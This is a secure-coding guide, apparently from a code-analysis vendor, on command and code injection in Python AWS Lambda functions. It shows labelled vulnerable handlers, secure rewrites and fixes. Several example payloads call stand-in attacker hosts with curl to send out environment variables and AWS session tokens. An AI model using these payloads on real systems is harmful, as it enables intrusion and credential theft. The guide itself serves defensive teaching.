Python AWS Lambda Dangerous System Call

Critical Risk: Code Injection
python, aws-lambda, system-calls, code-injection, serverless, os-system

What it is

The AWS Lambda function passes user-controlled input to dangerous execution functions such as os.system(), os.popen(), eval(), or exec(), creating command injection and arbitrary code execution vulnerabilities. In the Lambda environment, this can lead to compromise of the execution environment, unauthorized access to AWS services through the function's IAM role, and data exfiltration.

# Vulnerable: Dangerous system calls in Lambda
import os
import json

def lambda_handler(event, context):
    user_command = event.get('command', '')

    # Extremely dangerous: Direct command execution
    result = os.system(user_command)

    return {
        'statusCode': 200,
        'body': json.dumps({'result': result})
    }

# Another vulnerable pattern
def execute_script(event, context):
    script_code = event.get('script', '')
    variables = event.get('variables', {})

    # Dangerous: Dynamic code execution
    try:
        # User can execute arbitrary Python code
        exec(script_code, variables)
        return {'status': 'executed'}
    except Exception as e:
        return {'error': str(e)}

# File operations with user input
def process_files(event, context):
    filename = event['filename']
    operation = event['operation']

    # Dangerous: Command injection via filename
    command = f"find /tmp -name '{filename}' -exec {operation} {{}} \\;"  # Very dangerous
    output = os.popen(command).read()

    return {'output': output}

# Mathematical operations with eval
def calculate(event, context):
    expression = event.get('expression', '')

    try:
        # Dangerous: eval can execute arbitrary code
        result = eval(expression)
        return {'result': result}
    except Exception as e:
        return {'error': str(e)}
# Secure: Safe alternatives to system calls in Lambda
import json
import os  # used for environment-variable configuration below
import re
import math
import operator
import boto3
from decimal import Decimal

def lambda_handler(event, context):
    operation = event.get('operation', '')

    # Use allowlist of operations
    allowed_operations = {
        'list_files': list_s3_files,
        'get_file_info': get_file_metadata,
        'calculate': safe_calculate,
        'convert_data': convert_data_format
    }

    if operation not in allowed_operations:
        return {
            'statusCode': 400,
            'body': json.dumps({'error': 'Operation not allowed'})
        }

    try:
        result = allowed_operations[operation](event)
        return {
            'statusCode': 200,
            'body': json.dumps(result)
        }
    except Exception as e:
        return {
            'statusCode': 500,
            'body': json.dumps({'error': 'Operation failed'})
        }

# Secure file operations using AWS services
def list_s3_files(event):
    bucket_name = event.get('bucket_name', '')
    prefix = event.get('prefix', '')

    # Validate inputs
    if not re.match(r'^[a-zA-Z0-9.-]+$', bucket_name):
        raise ValueError('Invalid bucket name')
    if not re.match(r'^[a-zA-Z0-9/._-]*$', prefix):
        raise ValueError('Invalid prefix')

    # Use AWS SDK instead of shell commands
    s3_client = boto3.client('s3')
    try:
        response = s3_client.list_objects_v2(
            Bucket=bucket_name,
            Prefix=prefix,
            MaxKeys=100
        )
        files = []
        for obj in response.get('Contents', []):
            files.append({
                'key': obj['Key'],
                'size': obj['Size'],
                'last_modified': obj['LastModified'].isoformat()
            })
        return {'files': files}
    except Exception as e:
        raise Exception('Failed to list files')

def get_file_metadata(event):
    bucket_name = event.get('bucket_name', '')
    file_key = event.get('file_key', '')

    # Validate inputs
    if not re.match(r'^[a-zA-Z0-9.-]+$', bucket_name):
        raise ValueError('Invalid bucket name')
    if not re.match(r'^[a-zA-Z0-9/._-]+$', file_key):
        raise ValueError('Invalid file key')

    s3_client = boto3.client('s3')
    try:
        response = s3_client.head_object(Bucket=bucket_name, Key=file_key)
        return {
            'size': response['ContentLength'],
            'content_type': response.get('ContentType', 'unknown'),
            'last_modified': response['LastModified'].isoformat(),
            'etag': response['ETag']
        }
    except Exception as e:
        raise Exception('Failed to get file metadata')

# Safe mathematical operations
def safe_calculate(event):
    expression = event.get('expression', '')

    # Validate expression format
    if not re.match(r'^[0-9+\-*/().\s]+$', expression):
        raise ValueError('Invalid expression format')

    # Use safe evaluation with limited operations
    allowed_operators = {
        '+': operator.add,
        '-': operator.sub,
        '*': operator.mul,
        '/': operator.truediv,
        '**': operator.pow
    }

    # Simple expression parser (for basic operations)
    try:
        # Remove spaces
        expression = expression.replace(' ', '')

        # For simple cases, use a safe parser
        # This is a simplified example - use a proper math parser in production
        if '+' in expression:
            parts = expression.split('+')
            result = sum(float(part) for part in parts)
        elif '-' in expression and expression.count('-') == 1:
            parts = expression.split('-')
            result = float(parts[0]) - float(parts[1])
        elif '*' in expression:
            parts = expression.split('*')
            result = 1
            for part in parts:
                result *= float(part)
        else:
            result = float(expression)

        return {'result': result}
    except (ValueError, ZeroDivisionError) as e:
        raise ValueError('Invalid calculation')

# Safe data conversion
def convert_data_format(event):
    data = event.get('data', {})
    target_format = event.get('format', 'json')

    allowed_formats = ['json', 'csv', 'xml']
    if target_format not in allowed_formats:
        raise ValueError('Format not supported')

    try:
        if target_format == 'json':
            return {'converted': json.dumps(data)}
        elif target_format == 'csv':
            # Convert to CSV format (simplified)
            if isinstance(data, list) and all(isinstance(item, dict) for item in data):
                if data:
                    headers = list(data[0].keys())
                    csv_lines = [','.join(headers)]
                    for item in data:
                        row = [str(item.get(header, '')) for header in headers]
                        csv_lines.append(','.join(row))
                    return {'converted': '\n'.join(csv_lines)}
            raise ValueError('Data not suitable for CSV conversion')
        elif target_format == 'xml':
            # Simple XML conversion (use a proper library in production)
            xml_content = '<data>'
            for key, value in data.items():
                xml_content += f'<{key}>{value}</{key}>'
            xml_content += '</data>'
            return {'converted': xml_content}
    except Exception as e:
        raise Exception('Conversion failed')

# Configuration-based processing
def process_with_config(event, context):
    # Use environment variables instead of dynamic execution
    processing_mode = os.environ.get('PROCESSING_MODE', 'safe')
    max_items = int(os.environ.get('MAX_ITEMS', '100'))

    data = event.get('data', [])

    # Validate data length
    if len(data) > max_items:
        raise ValueError(f'Too many items (max: {max_items})')

    # Process based on configuration
    if processing_mode == 'safe':
        # Safe processing only
        processed = []
        for item in data:
            if isinstance(item, dict) and 'value' in item:
                processed.append({
                    'value': float(item['value']) * 2,
                    'processed': True
                })
        return {'processed_data': processed}
    else:
        raise ValueError('Processing mode not supported')


Why it happens

AWS Lambda functions frequently pass user-controlled event data straight into os.system(), os.popen(), eval(), or exec(). Because these functions hand their string arguments to /bin/sh or the Python interpreter, any shell metacharacter or code fragment in an event payload becomes executable. Event sources such as API Gateway, ALB, S3, SQS, and EventBridge all deliver attacker-influenced data, and injected commands or code inherit the permissions of the function's IAM execution role, so a single unvalidated parameter can expose AWS credentials, S3 buckets, DynamoDB tables, and other resources. The root causes below describe the specific patterns that introduce this exposure.

Root causes

Using os.system() with User-Provided Input from Lambda Events

AWS Lambda functions invoke os.system() with data extracted from Lambda event payloads, directly passing user-controlled strings to the operating system shell without sanitization or validation, creating critical command injection vulnerabilities. The os.system(command) function executes command through /bin/sh -c, making the entire string subject to shell interpretation where special characters enable command chaining, output redirection, and arbitrary code execution. Lambda event sources like API Gateway, ALB, S3, SQS, or EventBridge deliver user-controlled data that developers pass directly to os.system(): os.system(event['user_command']) enables attackers to inject malicious commands. API Gateway Lambda proxy integrations provide queryStringParameters, pathParameters, and request bodies that reach os.system() without validation, particularly in REST APIs where developers assume client-side validation prevents malicious input. The serverless execution model's stateless nature encourages using os.system() for quick file operations or system commands without considering security implications, as developers focus on business logic rather than security controls. Lambda's ephemeral /tmp filesystem and limited execution environment prompt developers to use shell commands for file manipulations that could be accomplished with Python libraries or AWS services, inadvertently introducing command injection vectors. Return values from os.system() indicate only exit status, not actual command output, leading developers to use os.popen() or subprocess with shell=True to capture output, further exposing vulnerabilities.
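A minimal sketch of this pattern follows; the handler and the attacker payload are hypothetical illustrations that assume an API Gateway proxy integration, not code from a real deployment.

import os
import json

def lambda_handler(event, context):
    # Vulnerable: the value arrives straight from an API Gateway proxy event
    params = event.get('queryStringParameters') or {}
    user_command = params.get('cmd', '')

    # os.system() hands the whole string to /bin/sh -c, so shell metacharacters
    # in the query string are interpreted rather than treated as data
    exit_code = os.system(user_command)
    return {'statusCode': 200, 'body': json.dumps({'exit_code': exit_code})}

# Hypothetical malicious query parameter (illustration only):
#   cmd = "ls /tmp; curl https://attacker.example/?t=$AWS_SESSION_TOKEN"
# The shell runs both commands; the second ships the function's temporary
# credentials, which Lambda exposes as environment variables, to an
# attacker-controlled host.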

Dynamic Code Execution with eval() or exec() Functions on Event Data

Lambda functions use Python's eval() or exec() to dynamically execute code strings derived from Lambda events, enabling attackers to execute arbitrary Python code within the Lambda execution environment with full access to boto3, AWS credentials, and Lambda function permissions. The eval(expression) function parses and evaluates Python expressions, while exec(code) executes arbitrary Python statements, both treating string inputs as executable code without sandboxing or restrictions. Serverless applications implement flexible data processing, mathematical calculations, or rule evaluation by accepting formulas or logic as Lambda event parameters: eval(event['formula']) allows attackers to inject malicious Python code disguised as mathematical expressions. API endpoints that accept user-defined transformation functions, filtering logic, or custom validators execute this code using eval()/exec(): event['transform_function'] might contain '__import__("os").system("curl attacker.com?data=$(cat /proc/self/environ)")' to exfiltrate environment variables containing AWS credentials. Lambda functions implementing configuration-as-code or programmable APIs use eval() to parse configuration syntax, not recognizing that this enables code injection rather than just data injection. Developers familiar with JavaScript's JSON.parse() may not realize Python's eval() executes code rather than merely parsing data structures, leading to security vulnerabilities when treating eval() as a safe deserialization mechanism. AWS Lambda execution roles grant functions permissions to AWS services via IAM policies, and code injected through eval()/exec() inherits these permissions, enabling attackers to access S3 buckets, DynamoDB tables, invoke other Lambda functions, or modify AWS resources.
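The sketch below shows why eval() is not a formula parser; the 'formula' value is a hypothetical attacker payload, and json.loads()/ast.literal_eval() appear only as data-parsing contrasts, not as complete fixes.

import ast
import json

# Vulnerable: the event 'formula' is executed, not parsed
def calculate(event, context):
    return {'result': eval(event.get('formula', '0'))}

# Hypothetical "formula" that is really code (illustration only):
#   __import__('os').popen('env').read()
# eval() executes it and returns the process environment, which includes the
# function's temporary AWS credentials.

# Safer contrasts: parse data without executing anything
parsed = json.loads('{"threshold": 10}')    # JSON data only, never code
literal = ast.literal_eval('[1, 2, 3]')     # Python literals only, no calls or names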

Using os.popen() to Execute Commands with Untrusted Lambda Data

Lambda functions invoke os.popen() to execute shell commands and capture output, passing user-controlled data from Lambda events directly into command strings without validation, enabling command injection attacks with immediate output feedback for attackers. The os.popen(command, mode) function opens a pipe to execute command through a shell, returning a file-like object that provides command output, making it attractive for Lambda functions needing to process shell command results. Lambda file processing workflows use os.popen() to invoke utilities like file, grep, awk, or custom scripts: output = os.popen(f'file {s3_key}').read() enables injection through S3 object keys that attackers control. API Gateway Lambda integrations that process user-uploaded filenames, search queries, or data filters pass these values to os.popen(): os.popen(f'grep "{search_term}" /tmp/data.txt').read() allows injection through search_term containing quote escapes and command separators. Unlike os.system() which only returns exit status, os.popen() provides command output, making it more dangerous as attackers receive immediate feedback, can exfiltrate data directly through output channels, and can iterate injection attempts to refine attacks. Lambda functions implementing log analysis, text processing, or data extraction use os.popen() to leverage shell utilities rather than Python libraries, introducing command injection risks for perceived convenience. The two-way communication provided by os.popen() enables attackers to not only execute commands but also retrieve results, list directory contents, read sensitive files, or query AWS metadata services to steal credentials.
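A short sketch of the output-feedback problem; the handler, file path, and payload are hypothetical.

import os

def search_logs(event, context):
    term = event.get('search_term', '')

    # Vulnerable: quotes in `term` break out of the grep argument
    output = os.popen(f'grep "{term}" /tmp/data.txt').read()
    return {'matches': output}

# Hypothetical search_term (illustration only):
#   " /dev/null; cat /proc/self/environ; echo "
# The shell now runs three commands, and the environment dump (including AWS
# credentials) is returned to the caller in the response body, giving the
# attacker immediate feedback for refining the attack.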

String Formatting or Concatenation in System Calls Without Escaping

Lambda function code constructs system call arguments using Python f-strings, str.format(), percent-formatting, or string concatenation that embed Lambda event parameters directly into command strings without escaping shell metacharacters, making command injection trivial. F-string patterns like os.system(f'aws s3 cp s3://{bucket}/{key} /tmp/') interpolate bucket and key from Lambda events where attackers control these values: injecting key = 'file.txt; curl attacker.com' chains commands to exfiltrate data. String concatenation patterns combine command components: os.system('convert ' + input_file + ' ' + output_file) enables injection through input_file or output_file parameters that contain semicolons, pipes, backticks, or other shell operators. The str.format() method suffers identical issues: os.system('grep "{}" {}'.format(pattern, filename)) treats special characters in pattern or filename as shell metacharacters rather than literal strings. Lambda functions processing S3 event notifications construct commands using object keys: os.system(f"file /tmp/{event['Records'][0]['s3']['object']['key']}") is vulnerable when S3 keys contain shell metacharacters, and S3 permits arbitrary key names. Developers familiar with SQL parameterized queries fail to apply equivalent principles to shell commands, not recognizing that string formatting produces a single command string subject to shell interpretation rather than safely separating command and arguments. Because shlex.quote() is easy to overlook and manual escaping with replace() or regex is fragile, developers construct commands through string formatting without proper security controls.
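If a subprocess truly cannot be avoided, passing an argument list with shell=False keeps metacharacters literal; the sketch below is a hedged illustration with hypothetical values that assumes the file utility is available in the runtime, and the AWS-SDK and native-library fixes later on this page remain the preferred approach.

import shlex
import subprocess

# Hypothetical value standing in for Lambda event data
key = 'report.txt; curl https://attacker.example'   # injection attempt hidden in an S3 key

# Unsafe: a single formatted string is interpreted by /bin/sh, so ';' chains commands
# os.system(f'file /tmp/{key}')

# Less fragile: an argument list with shell=False passes the value as one literal argument
completed = subprocess.run(
    ['file', f'/tmp/{key}'],
    shell=False,
    capture_output=True,
    text=True,
    timeout=10,
)
print(completed.stdout)

# shlex.quote() escapes a value for the rare case where a shell really is required
quoted = shlex.quote(key)   # the whole key becomes a single quoted word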

Missing Input Validation Before System Function Calls

Lambda functions execute system calls on Lambda event data without implementing validation, sanitization, allowlist checks, or format verification, trusting that upstream API Gateway validators, AWS WAF rules, or event source configurations prevent malicious input from reaching system call contexts. Serverless developers rely on API Gateway request validation schemas that verify JSON structure, data types, and required fields but do not validate content for command injection payloads: a schema requiring a string filename doesn't prevent values containing shell metacharacters. AWS WAF rules configured for SQL injection or XSS detection miss command injection patterns, particularly when attackers encode or obfuscate payloads to bypass pattern matching. Lambda functions processing data from internal AWS services like S3, DynamoDB, SQS, or Step Functions omit validation under the assumption that internal services provide trusted data, ignoring scenarios where attackers populate these services through application entry points. Event-driven architectures where Lambda functions respond to S3 uploads, DynamoDB streams, or SNS notifications process attacker-controlled data without recognizing the security boundary: S3 object keys, DynamoDB attribute values, or SNS message bodies may contain injection payloads. Inadequate error handling that catches exceptions from system calls without logging input parameters prevents detection of injection attempts and enables attackers to probe command syntax iteratively without triggering alerts. IAM policies granting Lambda functions broad AWS permissions amplify risks: functions with s3:*, dynamodb:*, or lambda:* permissions enable injected code to leverage boto3 and AWS CLI to access sensitive resources, modify configurations, or pivot to other AWS services.
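Even "internal" event sources deliver attacker-influenced values; the sketch below treats an S3 event notification as untrusted input, with a hypothetical key format used for the allowlist check.

import re
from urllib.parse import unquote_plus

def lambda_handler(event, context):
    # S3 event notifications URL-encode object keys, and attackers choose key names
    raw_key = event['Records'][0]['s3']['object']['key']
    key = unquote_plus(raw_key)

    # Treat the internal event as untrusted: enforce a strict format before any use
    if not re.fullmatch(r'[A-Za-z0-9/._-]{1,255}', key):
        raise ValueError('Rejected suspicious object key')

    return {'key': key}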

Fixes

1. Replace System Calls with AWS SDK (boto3) Operations

Eliminate os.system(), os.popen(), and shell command invocations from Lambda functions by using boto3 AWS SDK operations that provide type-safe, parameterized interfaces to AWS services without shell interpretation or code execution risks. Replace file operations with S3 API calls: instead of os.system('aws s3 cp'), use s3_client.download_file(), upload_file(), copy_object(), or put_object() that accept parameters as function arguments rather than shell strings. For listing resources, use boto3 list operations: s3_client.list_objects_v2(), dynamodb_table.scan(), lambda_client.list_functions() provide structured responses without requiring shell command parsing. Replace command-based data retrieval with direct API calls: ec2_client.describe_instances(), rds_client.describe_db_instances(), ecs_client.list_tasks() eliminate need for AWS CLI subprocess invocations. For cross-service orchestration, use lambda_client.invoke() to call other Lambda functions with JSON payloads, invoke Step Functions state machines with sfn_client.start_execution(), or publish messages via sns_client.publish() and sqs_client.send_message() rather than using curl or wget through os.system(). Configure boto3 with appropriate retry logic, timeout settings, and error handling: use botocore.config.Config to set read_timeout, connect_timeout, and retry strategies. Implement least privilege IAM policies that grant Lambda execution roles only specific actions on specific resources rather than broad permissions: restrict S3 access to specific buckets, DynamoDB access to specific tables. Use boto3 resource-level APIs for higher-level abstractions: s3_resource.Bucket(name).objects.filter(Prefix=prefix) provides Pythonic interfaces compared to client-level operations.
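A minimal sketch of the SDK-based replacement; the bucket name, prefix, and event fields are hypothetical, and the timeout/retry values are examples rather than recommendations.

import boto3
from botocore.config import Config

BUCKET = 'company-data-prod'   # hypothetical bucket name

config = Config(
    connect_timeout=5,
    read_timeout=10,
    retries={'max_attempts': 3, 'mode': 'standard'},
)
s3_client = boto3.client('s3', config=config)

def lambda_handler(event, context):
    file_key = event['file_key']

    # Instead of os.system(f'aws s3 cp s3://{BUCKET}/{file_key} /tmp/'):
    # parameters are passed as arguments, never interpolated into a shell string,
    # so there is nothing for an attacker to inject into
    local_path = '/tmp/' + file_key.rsplit('/', 1)[-1]
    s3_client.download_file(BUCKET, file_key, local_path)

    # Instead of parsing `aws s3 ls` output:
    response = s3_client.list_objects_v2(Bucket=BUCKET, Prefix='reports/', MaxKeys=100)
    keys = [obj['Key'] for obj in response.get('Contents', [])]

    return {'downloaded': local_path, 'report_count': len(keys)}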

2. Use Native Python Libraries Instead of Shell Command Utilities

Replace shell utility invocations with native Python libraries that provide equivalent functionality through safe APIs immune to command injection: use pathlib for file operations, json/xml modules for data parsing, hashlib for checksums, and specialized libraries for format conversions. For file type detection, use python-magic library instead of 'file' command: import magic; mime = magic.from_file(filepath, mime=True) safely identifies file types. For text processing replacing grep/sed/awk, use Python's re module: re.findall(pattern, text) for searching, str.replace() for substitution, str.split() and list comprehensions for filtering. For compression operations, use zipfile, gzip, tarfile, or bz2 modules instead of shell tar/gzip commands: zipfile.ZipFile(archive, 'w').write(filename) creates archives safely. For PDF processing, use PyPDF2, pdfplumber, or pdfminer libraries instead of 'pdfinfo' or 'pdftotext' shell commands: PyPDF2.PdfFileReader(file).getNumPages() extracts PDF metadata. For image processing, use Pillow (PIL) instead of ImageMagick: Image.open(input_path).resize((800, 600)).save(output_path) resizes images. For HTTP operations, use requests library instead of curl: requests.get(url, timeout=5) fetches URLs safely with automatic parameter escaping. For mathematical calculations, use math, decimal, or numpy modules instead of eval(): decimal.Decimal operations provide safe arithmetic. For JSON operations, use json.loads() and json.dumps() instead of jq subprocess: parsed = json.loads(json_string) safely parses JSON without code execution risks. Install libraries in Lambda deployment packages or Lambda layers to ensure availability at runtime.
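The sketch below pairs a few common shell idioms with native-library equivalents; the file paths and URL are hypothetical, and requests is assumed to be packaged in the deployment artifact or a Lambda layer.

import hashlib
import re
import zipfile
from pathlib import Path

import requests  # assumed packaged with the function or provided by a layer

def lambda_handler(event, context):
    text = Path('/tmp/data.txt').read_text(encoding='utf-8')

    # Instead of os.popen('grep ERROR /tmp/data.txt'):
    error_lines = [line for line in text.splitlines() if re.search(r'\bERROR\b', line)]

    # Instead of os.system('zip /tmp/out.zip /tmp/data.txt'):
    with zipfile.ZipFile('/tmp/out.zip', 'w') as archive:
        archive.write('/tmp/data.txt', arcname='data.txt')

    # Instead of os.popen('sha256sum /tmp/out.zip'):
    digest = hashlib.sha256(Path('/tmp/out.zip').read_bytes()).hexdigest()

    # Instead of os.system('curl https://internal.example/api/status'):
    response = requests.get('https://internal.example/api/status', timeout=5)

    return {
        'error_count': len(error_lines),
        'archive_sha256': digest,
        'status_code': response.status_code,
    }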

3. Validate and Sanitize All User Input from Lambda Events

Implement comprehensive input validation for all Lambda event data using strict schemas, allowlists, regular expressions, and type checking to prevent malicious input from reaching any system call contexts or dynamic code execution paths. Define event schemas using JSON Schema and validate all incoming events at Lambda function entry points: use jsonschema.validate(event, schema) to enforce structure, types, and required fields before processing. Apply allowlist validation for enumerated inputs: operations = ['read', 'write', 'list']; if event['operation'] not in operations: raise ValueError('Invalid operation') ensures only permitted values proceed. Use regular expressions to restrict string inputs to safe character sets: re.match(r'^[a-zA-Z0-9._-]+$', filename) permits only alphanumeric characters, dots, hyphens, and underscores, blocking shell metacharacters like semicolons, pipes, backticks, and dollar signs. Implement length limits on all string parameters: MAX_LENGTH = 255; if len(input_string) > MAX_LENGTH: raise ValueError('Input exceeds maximum length') prevents buffer overflows and limits attack payload size. Validate file paths to prevent directory traversal: Path(file_path).resolve().is_relative_to(safe_base_path) ensures paths remain within permitted directories using pathlib's resolve() to normalize paths and eliminate .. components. Check for and reject shell metacharacters explicitly: FORBIDDEN = set(';|&$`\n()'); if any(c in user_input for c in FORBIDDEN): raise ValueError('Invalid characters') blocks obvious injection attempts. Use type coercion for numeric inputs: count = int(event['count']) raises ValueError for non-integer input before it reaches system contexts. Log validation failures to CloudWatch with sanitized input samples for security monitoring: logger.warning(f'Validation failed: {sanitized_input[:100]}'). Implement input sanitization as a last resort, preferring rejection over transformation: sanitized = re.sub(r'[^a-zA-Z0-9]', '', input) removes special characters.
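A condensed validation sketch combining schema, character-set, and path checks; the schema, field names, and base directory are hypothetical, jsonschema is assumed to be packaged with the function, and Path.is_relative_to() requires Python 3.9 or newer.

import re
from pathlib import Path

from jsonschema import ValidationError, validate  # assumed packaged with the function

EVENT_SCHEMA = {
    'type': 'object',
    'required': ['operation', 'filename'],
    'properties': {
        'operation': {'type': 'string', 'enum': ['read', 'write', 'list']},
        'filename': {'type': 'string', 'maxLength': 255},
    },
    'additionalProperties': False,
}

SAFE_NAME = re.compile(r'^[A-Za-z0-9._-]+$')
SAFE_BASE = Path('/tmp/uploads')

def lambda_handler(event, context):
    # Structural validation: types, required fields, enumerated operations
    try:
        validate(event, EVENT_SCHEMA)
    except ValidationError as exc:
        return {'statusCode': 400, 'body': f'Invalid event: {exc.message}'}

    # Content validation: allow only a safe character set
    filename = event['filename']
    if not SAFE_NAME.match(filename):
        return {'statusCode': 400, 'body': 'Filename contains forbidden characters'}

    # Defense in depth: resolve the path and confirm it stays inside the base directory
    target = (SAFE_BASE / filename).resolve()
    if not target.is_relative_to(SAFE_BASE):
        return {'statusCode': 400, 'body': 'Path escapes the permitted directory'}

    return {'statusCode': 200, 'body': f"{event['operation']} accepted for {filename}"}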

4. Implement Strict Allowlists for Permitted Operations and Parameters

Define and enforce allowlists that specify exactly which operations can be executed and what parameter values are acceptable, validating all Lambda event operations against these allowlists before any processing to prevent arbitrary code execution or command injection. Create operation allowlists as dictionaries mapping permitted operation names to handler functions: ALLOWED_OPERATIONS = {'list_files': list_files_handler, 'get_metadata': metadata_handler, 'process_data': data_processor}; if event['operation'] not in ALLOWED_OPERATIONS: raise ValueError('Operation not permitted') ensures only pre-approved operations execute. For file extensions, maintain strict allowlists: ALLOWED_EXTENSIONS = {'.txt', '.json', '.csv', '.pdf'}; if Path(filename).suffix not in ALLOWED_EXTENSIONS: raise ValueError('File type not supported') restricts processing to known safe formats. Implement MIME type validation using python-magic: ALLOWED_MIMES = {'text/plain', 'application/json', 'text/csv'}; detected_mime = magic.from_buffer(file_content, mime=True); if detected_mime not in ALLOWED_MIMES: raise ValueError('MIME type not allowed') validates actual file content rather than trusting extensions. For bucket names and resource identifiers, use allowlists: PERMITTED_BUCKETS = {'company-data-prod', 'company-uploads-prod'}; if bucket_name not in PERMITTED_BUCKETS: raise ValueError('Bucket not allowed') prevents access to unintended S3 buckets. Create parameter validation functions for reusable validation logic: validate_safe_path(path), validate_safe_identifier(id), validate_safe_string(s) encapsulate validation rules. Use configuration loaded from AWS Systems Manager Parameter Store or Secrets Manager for allowlist definitions: allowed_operations = json.loads(ssm_client.get_parameter(Name='/app/allowed_operations')['Parameter']['Value']) enables operational control without code changes. Document security justification for each allowed operation and review allowlists during security audits. Implement comprehensive audit logging: log all operation invocations with operation name, parameters, result status, and Lambda request ID to CloudWatch for security monitoring and forensics.
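A sketch of an allowlist loaded from Parameter Store with audit logging; the parameter name, extension list, and log fields are hypothetical, and the handler assumes the execution role is allowed ssm:GetParameter on that parameter.

import json
from pathlib import Path

import boto3

ssm_client = boto3.client('ssm')

ALLOWED_EXTENSIONS = {'.txt', '.json', '.csv', '.pdf'}
_allowed_operations = None

def allowed_operations():
    # Cache the allowlist across warm invocations; the parameter value is a JSON
    # list such as ["list_files", "get_metadata"]
    global _allowed_operations
    if _allowed_operations is None:
        param = ssm_client.get_parameter(Name='/app/allowed_operations')
        _allowed_operations = set(json.loads(param['Parameter']['Value']))
    return _allowed_operations

def lambda_handler(event, context):
    operation = event.get('operation', '')
    filename = event.get('filename', '')

    if operation not in allowed_operations():
        return {'statusCode': 403, 'body': 'Operation not permitted'}
    if Path(filename).suffix.lower() not in ALLOWED_EXTENSIONS:
        return {'statusCode': 400, 'body': 'File type not supported'}

    # Audit log line for CloudWatch
    print(json.dumps({
        'request_id': context.aws_request_id,
        'operation': operation,
        'filename': filename,
    }))
    return {'statusCode': 200, 'body': 'accepted'}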

5. Use Lambda Environment Variables for Configuration Instead of Dynamic Execution

Replace dynamic code execution patterns using eval() or exec() with Lambda environment variables that provide static configuration values, eliminating code injection risks while maintaining operational flexibility. Define configuration values as Lambda environment variables: set PROCESSING_MODE, MAX_ITEMS, ALLOWED_OPERATIONS in Lambda function configuration rather than accepting these values from events or executing code to compute them. Access environment variables via os.environ in Lambda code: processing_mode = os.environ.get('PROCESSING_MODE', 'strict') retrieves configuration safely without code execution. For mathematical operations, implement safe calculation functions using operator module: OPERATORS = {'+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv}; result = OPERATORS[op](a, b) executes arithmetic without eval(). For rule-based logic, implement decision trees or lookup tables: rules = {'premium_user': lambda x: x.tier == 'premium', 'high_value': lambda x: x.value > 1000}; if rules[rule_name](user): process() evaluates logic safely. For data transformations, use predefined transformation functions: TRANSFORMATIONS = {'uppercase': str.upper, 'lowercase': str.lower, 'strip': str.strip}; result = TRANSFORMATIONS[transform_name](data) applies transformations without code execution. Use AWS AppConfig or Parameter Store for complex configuration that requires frequent updates: config = appconfig_client.get_configuration() retrieves JSON configuration without deploying new Lambda versions. Implement feature flags via environment variables: FEATURE_ADVANCED_PROCESSING = os.environ.get('FEATURE_ADVANCED_PROCESSING') == 'true' enables conditional logic without dynamic code. For template rendering, use safe templating libraries like Jinja2 with autoescape enabled: Template(template_string, autoescape=True).render(context) prevents code injection in templates. Document all environment variables in Lambda function description and deployment templates. Use Infrastructure as Code (CloudFormation, Terraform, SAM) to define environment variables declaratively.
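A sketch of configuration-driven processing without eval() or exec(); the environment variable names, operator set, and transformations are hypothetical examples.

import operator
import os

# Static configuration from Lambda environment variables (set via IaC), not from the event
PROCESSING_MODE = os.environ.get('PROCESSING_MODE', 'strict')
MAX_ITEMS = int(os.environ.get('MAX_ITEMS', '100'))

# Predefined building blocks replace dynamic code execution
OPERATORS = {'+': operator.add, '-': operator.sub, '*': operator.mul, '/': operator.truediv}
TRANSFORMATIONS = {'uppercase': str.upper, 'lowercase': str.lower, 'strip': str.strip}

def lambda_handler(event, context):
    op = event.get('op', '+')
    if op not in OPERATORS:
        raise ValueError('Operator not supported')
    result = OPERATORS[op](float(event['a']), float(event['b']))

    transform = event.get('transform', 'strip')
    if transform not in TRANSFORMATIONS:
        raise ValueError('Transformation not supported')
    label = TRANSFORMATIONS[transform](str(event.get('label', '')))

    items = event.get('items', [])
    if len(items) > MAX_ITEMS:
        raise ValueError(f'Too many items (max: {MAX_ITEMS})')

    return {'mode': PROCESSING_MODE, 'result': result, 'label': label}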

6. Leverage AWS Managed Services for File Processing and Data Operations

Replace shell command-based file processing with AWS managed services that provide secure, scalable alternatives: use AWS Textract for OCR, AWS Transcribe for audio transcription, AWS Translate for language translation, AWS Rekognition for image analysis, and AWS Comprehend for text analysis. For document format conversion, use AWS Lambda with language-specific libraries packaged in Lambda layers: pypdf2 for PDF, python-docx for Word documents, openpyxl for Excel files instead of LibreOffice or pandoc subprocess invocations. Leverage S3 Object Lambda to process data as it's retrieved: implement transformations, redactions, or format conversions inline without separate Lambda processing steps that might use shell commands. Use AWS Glue for ETL operations instead of Lambda functions with subprocess-based data transformation: Glue provides managed PySpark environments for data processing at scale. Implement media processing with AWS Elastic Transcoder or AWS Elemental MediaConvert instead of ffmpeg subprocess: these services provide APIs for video transcoding, thumbnail generation, and format conversion. For image processing beyond simple resizing, use AWS Rekognition for object detection, facial analysis, and text extraction from images: rekognition_client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': key}}) analyzes images via API. Use AWS Lambda Layers to package native libraries and Python wrappers: create layers containing Pillow, NumPy, or other data processing libraries that eliminate need for shell command invocations. Implement Step Functions state machines to orchestrate complex multi-step processing workflows: coordinate multiple Lambda functions, AWS services, and conditional logic without shell scripting. Design Lambda functions with single responsibilities that use AWS service APIs exclusively, avoiding general-purpose command execution capabilities. Document rationale for any subprocess usage and architect alternatives using managed services during code reviews.
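A sketch replacing image-analysis and OCR subprocesses with managed-service API calls; the bucket and key come from a hypothetical, already-validated event, both services are pointed at the same object purely for illustration, and the execution role is assumed to allow rekognition:DetectLabels and textract:DetectDocumentText.

import boto3

rekognition_client = boto3.client('rekognition')
textract_client = boto3.client('textract')

def lambda_handler(event, context):
    bucket = event['bucket']   # hypothetical, validated upstream
    key = event['key']

    # Image analysis via API call instead of an ImageMagick or exiftool subprocess
    labels = rekognition_client.detect_labels(
        Image={'S3Object': {'Bucket': bucket, 'Name': key}},
        MaxLabels=10,
        MinConfidence=80,
    )

    # Text extraction via Textract instead of shelling out to pdftotext or tesseract
    ocr = textract_client.detect_document_text(
        Document={'S3Object': {'Bucket': bucket, 'Name': key}}
    )
    lines = [block['Text'] for block in ocr['Blocks'] if block['BlockType'] == 'LINE']

    return {
        'labels': [label['Name'] for label in labels['Labels']],
        'text_line_count': len(lines),
    }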

Detect This Vulnerability in Your Code

Sourcery automatically identifies Python AWS Lambda dangerous system calls and many other security issues in your codebase.